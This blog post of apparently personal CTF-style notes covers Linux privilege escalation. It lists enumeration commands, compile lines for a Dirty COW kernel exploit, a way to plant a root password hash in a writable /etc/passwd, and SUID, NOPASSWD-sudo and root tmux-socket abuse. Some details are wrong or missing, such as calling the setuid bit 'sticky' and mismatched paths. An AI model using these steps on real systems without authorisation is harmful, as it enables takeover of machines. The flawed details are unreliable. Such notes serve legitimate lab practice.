Linux Post Exploitation

Steps to Follow after an initial Foothold is found on a linux OS.


uname -a
cat /etc/passwd
sudo -l

32bit or 64bit?
file /sbin/init
uname -a ( x_64 = 64bit) (i386 or i686 = 32bit)

Look in the home directory of the user "ls -lAR", do you find "​"
if so it maybe vulnerable to "Exploit-DB 14339"

Run Scripts


Priv'esc check (Pentest Monkeys)

Kernel Exploits

What is the version of the Kernel (uname -a)

2.6.x -> 3.9 try DIRTY COW first (searchsploit 2.6 cow) (try first 40616.c)
compile locally(dont try to use -m32 on an 64 bit box for this exploit)
32bit -  gcc -pthread 40839.c -o 40839-32 -lcrypt -m32
64bit - gcc -pthread 40839.c -o 40839-64 -lcrypt

2.6.x --> then "searchsploit 2.6.x)

What files are word readable?
If /etc/passwd is..

Then add an encrypted version of a password then run it against the root user.

openssl passwd sp00ks

so now we copy dhaczA9zC7C5k to the root users passwd line like so...


and now we can do
# su

root@BOX:~# id
uid=0(root) gid=0(root) groups=0(root)

Check SUID

SUID - at least one should work if not all of them.

find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null

Example Vulnerable file

-rwsr-xr-x 1 root root 112204 Jun 14 2017 /var/htb/bin/emergency

We see the "s" is set for sticky and that it is executable by everyone!

So now run it "./var/htb/emergency"
and you should have root

Running SUDO permission without a password

User www-data may run the following commands on bashed: (scriptmanager : scriptmanager) NOPASSWD: ALL

In this example as this is a user not a file, we can execute as user "scriptmanager"
without specifying a password.

www-data@bashed:/dev/shm$ sudo -u scriptmanager /bin/bash scriptmanager@bashed:/dev/shm$


What services are listening on localhost or


Process List (ps -aux)

Tmux session running as root????

:~$ ps -aux | grep tmux
Warning: bad ps syntax, perhaps a bogus '-'? See
root 1023 0.0 0.1 26416 1672 ? Ss Nov04 0:10 /usr/bin/tmux -S /.devs/dev_sess

 Connect to it - "tmux -S /.devs/dev_sess"


No comments:

Post a Comment